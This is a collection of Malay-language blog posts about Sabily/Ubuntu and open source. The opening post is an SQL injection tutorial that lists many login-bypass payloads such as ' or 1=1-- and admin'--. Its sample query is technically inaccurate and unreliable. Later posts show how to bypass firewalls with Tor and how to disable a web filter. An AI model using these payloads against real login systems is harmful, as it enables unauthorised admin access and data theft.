Silat SQL: Pengenalan dan Suntikan Asas Secara Umum

2009-05-20T13:39:00.007+08:00

Salam sejahtera semua,

Artikel kali ini akan membicarakan mengenai suntikan SQL. Kelemahan keselamatan laman sesawang berasaskan suntikan (injection flaw) mendapat tempat kedua sebagai kelemahan yang paling banyak ditemui di dalam aplikasi sesawang. [Sila rujuk http://www.owasp.org/index.php/Top_10_2007]. Oleh itu teknik suntikan SQL walaupun nampak remeh, namun hakikatnya berbisa.

Suntikan SQL asas

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

'or'1'='1

'or'a'='a

' or 1=1 #

1=1

"1'or'1'='1

1'or'1'='1

' or '1' = '1

admin'--

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

'or"='

"My password is ' or 1=1--" adalah antara ungkapan yang menerangkan magic quote SQL untuk memintas halangan pengesahan log masuk sama ada pengguna biasa (user) atau pun pentadbir (admin). Daripada memasukkan nama pengguna dan katalauan yang sah, seorang penyerang akan menggunakan ungkapan SQL sebagai galang gantinya.

Contoh:

Nama Pengguna: ' or 1=1 --
Kata Laluan : ' or 1=1 --

Seorang penyerang mungkin dapat memintas pengesahan (authentication) pentadbir dan sekaligus dapat menjalankan tugasan sebagai seorang pentadbir sekiranya sistem log masuk tersebut menggunakan pangkalan data(database). Kelebihan sebagai pentadbir membolehkan seorang penyerang itu mengubah laman sesawang (website defacement), menebuk pintu belakang (planting backdoor), mahupun mencuri data sulit pengguna-pengguna di dalam sistem aplikasi web tersebut.

Mungkin anda semua akan membangkitkan persoalan kenapa dalam suntikan sql, untuk memintas log masuk kita akan gunakan string ' or 1=1--

Bila kita tengok semula, kemungkinan kenyataan yang digunakan untuk log masuk adalah :

SELECT Request.Form("pengguna") and Request.Form("katalaluan") FROM usertable

pemboleh ubah pengguna dan katalaluan digunakan untuk mengambil input yang dimasukkan oleh pengguna.

Dalam kenyataan di atas, sekiranya pengguna masukkan pengguna dan katalaluan yang betul, baru kenyataan tersebut akan dijalankan.

Para penggodam pula akan bermain-main dengan logik kat sini. Bila seseorang penggodam itu memasukkan ' or 1=1--, kenyataan di atas akan berubah menjadi:

SELECT ' or 1=1-- and ' or 1=1-- FROM usertable

tanda tick (') digunakan untuk break(pecahkan) kenyataan sql, tanda -- untuk komen yang bermaksud aplikasi sesawang tidak akan melaksanakan apa-apa kenyataan selepas tanda --.

or bermaksud atau, 1=1 bermaksud kita reka satu kenyataan yang benar, jadi, bila kenyataan sql ni jumpa 1=1 dia akan anggap benar. Sebab inilah yang membolehkan kita memintas log masuk. Kita boleh juga memasukkan 2=2, 3=3, yang penting kenyataan tersebut adalah benar.

Bila kita memintas log masuk dengan cara ni, kita akan dapat masuk dengan kelebihan (privillege) user yang paling atas dalam database. Selalunya pentadbir (admin).

Kenyataan di bawah ini lebih jelas untuk kita semua perhatikan:

SELECT 'id' and 'or '1'='1 and 'or '1'='1 FROM usertable

Bersambung ke Suntikan SQL Asas : MySQL 4 dan MySQL 5

Artikel ini merupakan sebahagian dari buku elektronik (e-book) "Silat SQL" yang merupakan rancangan penulis untuk menerbitkannya dan dilesenkan dengan Metasploit Framework License bagi mengelakkannya dieksploitasi secara komersil oleh pihak yang tidak bertanggungjawab dalam menghargai sumbangan komuniti
sumber terbuka.

Buku ini akan diedarkan secara percuma bagi menghargai konsep sumber terbuka dan falsafah ilmu yang merupakan hakmilik mutlak Yang Maha Mengetahui dan tidak wajar dihakciptakan oleh manusia.

Penulis mengucapkan jutaan terima kasih dan setinggi penghargaan kepada semua ahli HM Security Team terutama kepada Saudara ghimau yang menjadi antara sumber inspirasi penulis dalam dunia komuniti 'securityunderground', Crew,VVIP, VIP dan ahli-ahli biasa HMSecurity. Tidak lupa juga kepada komuniti sumber terbuka di seantero dunia.

Sebarang penyalahgunaan maklumat di dalam artikel ini adalah tanggungjawab mereka yang terlibat dan bukan merupakan tanggungjawab penulis.

Muat turun Sabily 9.04

2009-05-18T14:56:00.002+08:00

Sila gunakan Wuala Client untuk memudahkan anda memindah turun ISO sabily.

http:\\www.wuala.com

Sila cari berdasarkan keyword "sabily" atau tambah "jmehdi" sebagai kenalan anda di Wuala.

MSC Malaysia OSCONF 2009

2009-05-18T12:36:00.005+08:00

The 2009 MSC Malaysia Open Source Conference
INVITATION TO PARTICIPATE IN MSC MALAYSIA OPEN SOURCE CONFERENCE 2009

Date: 31 May - 3 June, 2009
Venue: Berjaya Times Square Hotel & Convention Center, Kuala Lumpur.

MSC Malaysia's inaugural and full-fledged Open Source Conference to incorporate a "Quadruple play" of 4 crucial stakeholders consisting of government, businesses, developers and community in envisioning open source's contribution to the IT industry and socio-economy.

Positioned as International forum for sharing and exchanging ideas on technical advancements, applications, development and business cases on open source, and its positive impact in meeting challenges of the current economic climate.

Organised by MSC Malaysia in cooperation with the Malaysian Administrative Modernisation and Management Planning Unit (MAMPU), the annual MSC Malaysia OSCONF is also supported by the Malaysian Open Source community. This event complements the annual Malaysian Government Open Source Software Conference (MyGOSSCON) as the premier platform for all things Open Source in Malaysia.

With 3 DAYS, 3 TRACKS, 1 HACKATHON are in store for everyone who attend this conference. In addition, we have renowned speakers from prime Open Source Enterprises which are Mozilla, Google and Red Hat to name a few and also not forgeting from the developer community - Ubuntu, BSD, Fedora, PHPs, etc

Come join us at the MSC Malaysia Open Source Conference 2009! You'll be pleasantly surprised...
Who should attend?

* Business executives from MSC Malaysia and Non-MSC Malaysia Status companies
* Open Source developers, communities, inventors, evangelist, researchers, strategist
* Government officers
* Students, general public

Why you should attend?

1. Provide exposure and knowledge on the importance of Open Source in enhancing competitiveness by giving freedom of choice in software usage with lower total cost of ownership, hence benefiting businesses and society at large. Over 30 session tracks are made available.
2. Share amongst the open source community on new directions and latest innovations by the subject matter experts, thought leaders and industry gurus.
3. Provide a platform for conference participants to actively interact, share and exchange views, ideas, and tools on the latest trends and issues of Open Source.
4. Networking, learning and having great fun!

Assalamualaikum dan Selamat Sejahtera semua,

Mungkin ramai yang dah tahu, tapi tak apalah, saya ceritakan juga. Pada 31 Mei hingga 3 Jun ini akan diadakan Persidangan Sumber Terbuka 2009 MSC Malaysia yang julung-julung kalinya diadakan di Malaysia. Tempatnya adalah Berjaya Times Square Hotel & Conference Centre.

Ramai tokoh-tokoh dalam arena sumber terbuka global dan tempatan akan turut serta dalam persidangan ini dengan membentangkan kertas kerja atau menyampaikan syarahan mereka mengenai projek sumber terbuka di mana mereka terlibat.

Antara pembentang adalah:

Chris DiBona, Pengurus Program Sumber Terbuka Google. Antara tugas Chris adalah Google Summer of Code dan kod perisian sumber terbuka di http://code.google.com

Anthony Baxter dari Google Australia, Python guru.

Matthew Olander, ahli Pemasaran Projek FreeBSD.

Tak lupa juga pembangun dan otai sumber terbuka Malaysia, antaranya:

Redhuan D. Oon atau "Red1", ketua projek ADempiere ERP.

Amir Haris Ahmad pengasas zonestraits.com. Blog saya juga ada menggunakan domain di bawah projek zonestraits.com iaitu Blog KaibaTheLegacy, http:\\ak47suk1.via.my

Jangan mengaku penggodam Malaysia kalau Amir pun anda tak kenal. Pasal apa? Saya tak nak cerita di sini, anda semua carilah sendiri pasal sudut gelap sejarah Amir ni. Hehehe :D

Hackathon pada 31 Mei ni percuma. Datanglah beramai-ramai. Saya sendiri Insya-Allah jika tiada sebarang halangan akan pergi juga ke sana. Sebab tak pasti lagi tempat penginapan sepanjang 4 hari nanti. Nak kena pastikan dulu. :)

Konferens 3 hari juga harganya agak berpatutan bagi pelajar cuma RM50, jangan lupa bawa kad matrik. Kalau tak, kena cas penuh :lol:

Maklumat lanjut boleh tengok sini.

http://www.mscmalaysia.my/article/open+Source+Conference/OSCONF

Guna Pidgin dengan Tor

2009-05-12T22:31:00.005+08:00

Assalamualaikum dan Salam Sejahtera Semua,

Hari ini saya akan menunjukkan cara-cara untuk menggunakan Tor dengan Pidgin di Ubuntu.

Kenapa perlu gunakan Tor?

Sesetengah pejabat,sekolah,pusat pengajian tinggi atau mana-mana lokasi menghalang akses kepada Yahoo Messenger dengan ketetapan di firewall. Tor adalah satu perisian proksi yang dapat menembusi tembok halangan tersebut. Insya-Allah :)

Bagaimana untuk pasang Tor?

1.Tambahkan ppa berikut ke repositori anda (Repositori boleh diakses di System > Administration > Software Sources)

deb http://mirror.noreply.org/pub/tor jaunty main

2. Klik Close

3. Buka Terminal.

4. Taip arahan berikut di Terminal.

sudo su

gpg --keyserver keys.gnupg.net --recv 94C09C7F

gpg --fingerprint 94C09C7F

gpg --export 94C09C7F | sudo apt-key add -

apt-get update

apt-get install tor

5. Selepas selesai proses pemasangan, sila reboot pc anda.

6. Buka Pidgin Internet Messenger

7. Pergi ke Accounts > Manage Account

8. Klik pada akaun YM anda dan klik Modify

9. Klik tab Advanced

10. Klik drop-down menu Proxy Type dan pilih SOCKS 5

11. Setkan

Host: 127.0.0.1
Port:9050

12. Klik Save.

13. Hilang Tandakan Akaun YM anda di Accounts dan tandakan semula. Atau anda boleh restart Pidgin.

14. Mudah bukan?

Panduan mudah kemaskini Ubuntu ME ke Sabily Jaunty

2009-05-03T16:06:00.003+08:00

Salam semua,

Hari ini saya ingin berkongsi dengan anda bagaimana untuk mengemaskini Ubuntu Muslim Edition Intrepid ke Sabily Jaunty.

1. Pergi ke System > Administration > Update Manager

2. Klik Upgrade.

3. Ikut arahan yang diberikan.

4. Boot semula.

5. Pergi ke System > Administration > Software Sources.

6. Hidupkan Third Party Software yang dimatikan semasa proses kemaskini.

ATAU sekiranya anda ingin mengubah Ubuntu asal kepada Sabily Jaunty

7. Jalankan arahan ini di Terminal.

sudo wget http://www.sabily.org/sources.list.d/`lsb_release -cs`.list
--output-document=/etc/apt/sources.list.d/sabily.list;
sudo apt-get -q update;
sudo apt-get --yes -q --allow-unauthenticated install sabily-keyring;
sudo apt-get -q update

sudo aptitude install sabily


7.  Jawab yes ketika diperlukan

Sesuaikah Perisian Sumber Terbuka untuk Pengguna Biasa?

2009-03-28T23:28:00.000+08:00

Assalamualaikum dan Salam sejahtera semua,

Hari ini, saya bersembang dengan seorang sahabat saya yang merupakan peminat tegar (hardcore fan) Microsoft. Beliau mengemukakan beberapa hujah untuk
mempertahankan pendapat beliau yang Linux kurang sesuai untuk pengguna biasa. Antara hujah-hujah beliau ialah:

- Sistem Operasi Windows telah siap sedia dengan pembelian komputer baru (OEM).

- Tidak ramai vendor yang menyokong Linux.

- Linux tak boleh berdaya saing kerana ianya percuma.

- Pergantungan kepada syarikat monopoli tidak menyusahkan pengguna.

- Produk no 1 akan menjadi sasaran utama serangan siber. Kalau linux menjadi no 1, penulis virus akan menjadikan Linux sebagai sasaran baru.

Sebelum saya mulakan untuk memberi sanggahan kepada pendapat beliau ini, saya ingin tegaskan bahawa saya bukan ingin memaksa mana-mana pihak untuk bertukar
kepada Linux, tetapi sekadar memberi sedikit galakan dan sokongan kepada mereka yang mahu berhijrah.

Sistem Operasi Windows telah siap sedia dengan pembelian komputer baru (OEM)

Kita tidak boleh nafikan bahawa kebanyakan komputer di pasaran telah dipasang sistem operasi Windows. Linux kurang promosi berbanding dengan Windows. Kita sejak kecil, didedahkan dengan Windows. Cuba kalau kita didedahkan dengan Linux semasa kecil lagi, sudah tentu kita akan lebih cenderung kepada Linux.

Semakin ramai vendor komputer riba membekalkan komputer riba dengan Linux OS walaupun bukan yang mesra pengguna. Saya sendiri tidak faham kenapa mereka sukar untuk bekerjasama dengan Canonical untuk siap sediakan komputer riba keluaran mereka dengan Ubuntu.

Tidak ramai vendor yang menyokong Linux

IBM dan Sun antara syarikat yang menyokong Linux kerana mereka menjadikan Linux sebagai sistem operasi pada sistem pelayan mereka. Namun begitu, terdapat sambutan yang menggalakkan dari syarikat-syarikat dan badan korporat yang menggunakan Linux untuk menjimatkan kos operasi dalam keadaan ekonomi global ketika ini.

Linux tak boleh berdaya saing kerana ianya percuma

Memang Linux percuma. Sebagai contoh, Ubuntu dan Sabily(Ubuntu Muslim Edition). Pada pendapat saya, Linux kurang promosi. Sahabat saya juga mengakui pendapat ini dan merasakan Linux rugi kerana diberikan secara percuma.

Mungkin nampak macam syarikat di sebalik tabir Ubuntu ini rugi, namun begitu, ada peluang perniagaan yang tidak ramai yang nampak. Perniagaan khidmat sokongan (support). Syarikat - syarikat yang mempromosikan Ubuntu menggunakan perkhidmatan kepada pengguna Ubuntu sebagai sumber mata pencarian. Walaupun Windows mempunyai pelbagai masalah, terdapat banyak kedai komputer yang mahir menyelenggara komputer yang menggunakan Windows.

Banyak peluang perniagaan dalam komuniti sumber terbuka. Kafe siber menggunakan Ubuntu dan OpenOffice.org menjimatkan kos penyelenggaraan kerana tiada masalah virus dan menyokong format dokumen Microsoft. Kita juga boleh membuka kelas untuk belajar Linux, membina laman web dengan Joomla, PHP dan MySQL, grafik dengan GIMP, urusan pentadbiran dengan OpenOffice.org, kelas multimedia dengan Blender, Kino, Cinelerra dan lain-lain. Kalau dapat masuk tender untuk memasang dan menyelenggara sistem komputer sumber terbuka badan-badan kerajaan dan swasta apatah lagi, perniagaan yang menguntungkan.

Pergantungan kepada syarikat monopoli tidak menyusahkan pengguna.

Pakatan industri hardware dengan Microsoft bukan lagi rahsia. Kalau pengguna tidak perlukan hardware berkuasa tinggi untuk sistem operasi mereka, buat apa mereka beli pc baru? Dengan sumber terbuka, kuasa kembali ke tangan pengguna dan bukan lagi golongan yang menangguk di air keruh.

Produk no 1 akan menjadi sasaran utama serangan siber. Kalau linux menjadi no 1, penulis virus akan menjadikan Linux sebagai sasaran baru.

Apache adalah perisian web server yang popular tetapi statistik menunjukkan IIS lebih banyak diserang. Kenapa? Sebab kelemahan yang wujud dalam IIS hanya boleh ditampal oleh Microsoft dan tidak seperti Apache dimana pepijatnya boleh dihapuskan oleh sesiapa sahaja yang ada kemahiran dalam pengaturcaraan.

Kesimpulannya, perisian terbuka memang sesuai kepada semua termasuk pengguna biasa. Promosi terhadap perisian sumber terbuka haruslah dipergiat agar pengguna dapat merasai kebebasan terhadap penggunaan sistem operasi dan perisian mereka.

NetworkManager - Kejap Ada, Kejap Tak Ada

2009-03-17T11:34:00.007+08:00

Assalamualaikum dan selamat sejahtera semua,

Hari ini saya ingin memberitahu anda semua bagaimana untuk menyelesaikan masalah NetworkManager yg kadangkala sering tiba-tiba jadi macam biskut, kejap ada dan kejap tak ada.

Sila ikuti langkah-langkah berikut:

Klik Kanan di desktop dan klik Create Launcher...

Isikan tempat kosong seperti di dalam gambar.

Command : nm-applet --sm-disable
Name: Tak kisah apa pun.

Ikon Launcher NetworkManager ini akan terpampang di desktop. Klik dua kali pada ikon tersebut sekiranya ikon NetworManager tiba-tiba hilang dari panel.

Bagaimana hendak mematikan fungsi WebStrict Di Sabily?

2009-03-07T22:45:00.004+08:00

Assalamualaikum dan Salam Sejahtera

Kali ini saya kongsikan serba-sedikit pengalaman saya semasa mula-mula menggunakan Sabily (dahulu dikenali sebagai Ubuntu Muslim Edition).

Apa itu WebStrict?
Menurut https://launchpad.net/webstrict , WebStrict adalah antaramuka pengguna (user interface) untuk DansGuardian, Perisian tapisan web.

Walau bagaimanapun, anda mungkin seperti saya yang kurang menyukai perisian tapisan ini kerana komputer tidak dikongsi. :)

Jom, kita mula sekarang.

1. Pergi ke System > Administration > Webstrict

2. Klik Stop. Lepas tu klik unlock.

3. Restart firefox jika sedang dijalankan di PC anda.

4.Pergi ke Edit > Preferences.
5. Klik Advanced dan pergi ke tab Network. Klik Settings.
6. Klik butang radio "No Proxy" . Sekarang, DansGuardian tidak lagi mengganggu pelayaran laman sesawang anda. :)
Saya tak kata WebStrict ni tak bagus. Saya cuma tak suka perisian tapisan web sebab saya rasa agak terganggu.

Saya cadangkan WebStrict digunakan di kiosk internet percuma untuk mengelakkan pelanggan download benda yg bukan-bukan dan juga untuk ibubapa dalam menentukan laman sesawang yang perlu untuk anak-anak mereka.

Selamat Datang Ke Blog Sabily untuk Malaysia

2009-03-05T13:24:00.004+08:00

Syahadah awal rukun Islam,
Solat pula rukun kedua;
Awal bismillah pemula kalam,
Berkat Selawat pengiring kata.

Datang bertandang saya alukan,
Moga manfaat dikongsi bersama;
Selamat datang saya ucapkan,
Buat peminat sumber terbuka.

Assalamualaikum dan selamat sejahtera kepada semua ke blog Sabily untuk Malaysia. Di sini saya sertakan serba sedikit tujuan saya membina blog ini.

Pertama sekali, saya ingin membantu komuniti sumber terbuka dan yang baharu berjinak-jinak dengan sistem operasi dan perisian sumber terbuka untuk lebih mengenali khususnya Linux Sabily yang dahulunya dikenali sebagai Ubuntu Muslim Edition.

Komuniti Sabily terpaksa menukarkan nama sistem operasi ini kepada Sabily kerana "Ubuntu" merupakan tanda niaga(trademark) Canonical Ltd..

Untuk mereka yang masih tertanya-tanya apakah Ubuntu ini sebenarnya, boleh rujuk di http://ms.wikipedia.org/wiki/Ubuntu

Apakah kelainan Sabily berbanding distro Ubuntu yang asal? Tidak banyak bezanya melainkan add-on Edubuntu, Perisian Islam sumber terbuka, dan rekabentuk(theme) yang bercirikan Islamic di samping perisian-perisian lain yang sesuai untuk pengguna biasa (end-user).

Saya sendiri pun baru sahaja bertukar ke Linux Sabily sepenuhnya sebulan yg lepas :) walaupun saya telah menggunakan Ubuntu dengan dwi-boot selama setahun. Saya bertukar disebabkan perkara yang biasa dialami oleh pengguna sistem operasi Windows iaitu masalah virus, skrin biru BSOD (Blue Screen Of Death), dan prestasi yang hambar.

Maklumat lanjut mengenai Linux Sabily ini boleh dirujuk di http://www.ubuntume.com/website. Terdapat usaha sahabat-sahabat kita di Malaysia terlibat sama menterjemah laman web ini ke Bahasa Melayu.

Sekian sahaja sebagai awalul kalam blog ini. Wassalam.